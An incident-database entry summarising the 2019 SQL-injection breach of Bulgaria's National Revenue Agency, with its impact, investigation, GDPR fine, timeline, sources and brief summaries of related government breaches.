Bulgarian National Revenue Agency breach

On 15 July 2019, an anonymous hacker emailed Bulgarian newsrooms a trove of data stolen from the National Revenue Agency (NAP), the country's tax authority. The leak — eventually confirmed to cover 6,074,140 data subjects — exposed records on almost the entire adult population of Bulgaria, making it the largest data breach in the country's history.

What happened

The intrusion began in June 2019, when the attacker found and exploited a SQL injection vulnerability in a rarely-used online service for VAT refunds. SQL injection — passing crafted input that the application executes as database commands — let the attacker read directly from NAP's back-end databases without any privileged access. Over an extended period the attacker pulled down dozens of database tables.

On 15 July the hacker emailed Bulgarian media with sample files and a message mocking the state of Bulgarian cybersecurity, claiming to hold more than 110 folders and around 21 gigabytes of data. About 11 GB in 57 folders circulated publicly. NAP confirmed the data's authenticity the next day.

Impact

Leaked records included full names, national identity numbers, addresses, income and tax data, social-security and pension contributions, health-related payments, and a register of online-gambling users — spanning from 2007 to mid-2019.
The CPDP's investigation found data on 6,074,140 people was compromised: roughly 4.1 million living Bulgarian and foreign citizens and 1.96 million deceased.
In a country of about 7 million, this represented nearly every living adult.

Investigation and penalty

Bulgarian police arrested Kristian Boykov, a 20-year-old penetration tester employed by a local cybersecurity firm, the day after the leak. He denied involvement and was released within days; the prosecution's case never produced a conviction, and the true perpetrator remains officially unconfirmed.

The data-protection regulator CPDP fined NAP 5.1 million BGN (about EUR 2.6 million) on 29 August 2019 for failing to implement adequate technical and organisational safeguards — one of the largest GDPR penalties in the EU at the time. Bulgarian courts later upheld the fine.

Why it matters

The NAP breach is a textbook example of a single application-layer flaw cascading into a national-scale exposure. A web vulnerability that a routine code review or web-application firewall should have caught instead surfaced the tax and identity records of an entire nation. It became the reference case in EU debates — including a formal European Parliament question — about whether member-state administrations holding mandatory citizen data were meeting their GDPR security obligations.

Timeline

June 1, 2019

An attacker exploits a SQL injection flaw in a rarely-used NAP online VAT-refund service and begins extracting database contents.

July 15, 2019

An anonymous hacker emails Bulgarian media outlets, attaching samples and claiming the theft of data from servers of the Ministry of Finance.

July 16, 2019

NAP confirms the authenticity of the leaked data; police arrest 20-year-old penetration tester Kristian Boykov.

July 18, 2019

Boykov is released; charges are later downgraded and the case against him does not result in a conviction.

August 29, 2019

The Commission for Personal Data Protection (CPDP) fines NAP 5.1 million BGN (about EUR 2.6 million) for inadequate security measures.

January 1, 2020

CPDP investigation concludes that personal data of 6,074,140 subjects was breached, including roughly 4.1 million living people and 1.96 million deceased.

January 1, 2021

Bulgarian courts uphold the 5.1 million BGN GDPR penalty against the agency.

Sources

en.wikipedia.orghttps://en.wikipedia.org/wiki/2019_Bulgarian_revenue_agency_hack

thehackernews.comhttps://thehackernews.com/2019/07/bulgaria-nra-data-breach.html

wolftheiss.comhttps://www.wolftheiss.com/insights/bulgaria-fines-in-millions-for-personal-data-breaches/

bta.bghttps://www.bta.bg/en/news/bulgaria/562392-district-court-upholds-bgn-5-million-fine-for-personal-data-leak-from-nra-system

europarl.europa.euhttps://www.europarl.europa.eu/doceo/document/E-9-2019-002962_EN.html

Related incidents

Vulnerability exploitContainedMay 9, 2026

765 users affected by claimed leak at Média31

On 9 May 2026, the threat actor AplaGroup claimed an intrusion into Média31, the online media-library platform of the Haute-Garonne departmental libraries (France), exposing data on roughly 765 users; the breach was confirmed on 21 May 2026.

Victim: Média31
Records: 765

Vulnerability exploitResolvedMay 2, 2024

City of Helsinki Education Division breach

An attacker exploited an unpatched vulnerability in a remote access server to breach the City of Helsinki's Education Division, exposing personal data of tens of thousands of students, guardians, and staff, plus sensitive welfare records.

Victim: City of Helsinki (Education Division)
Records: 120.0K

Vulnerability exploitResolvedAugust 8, 2023

UK Electoral Commission data breach

Chinese state-linked hackers exploited unpatched Microsoft Exchange ProxyShell flaws to dwell undetected in the UK Electoral Commission's systems for over a year, accessing electoral-register data on roughly 40 million voters.

Victim: UK Electoral Commission
Records: 40.0M

Vulnerability exploitResolvedJuly 24, 2023

Norwegian government Ivanti zero-day breach

Attackers exploited an Ivanti Endpoint Manager Mobile zero-day (CVE-2023-35078, CVSS 10.0) to breach a shared ICT platform used by 12 Norwegian government ministries, with exploitation traced back to at least April 2023.

Victim: Norwegian government (12 ministries)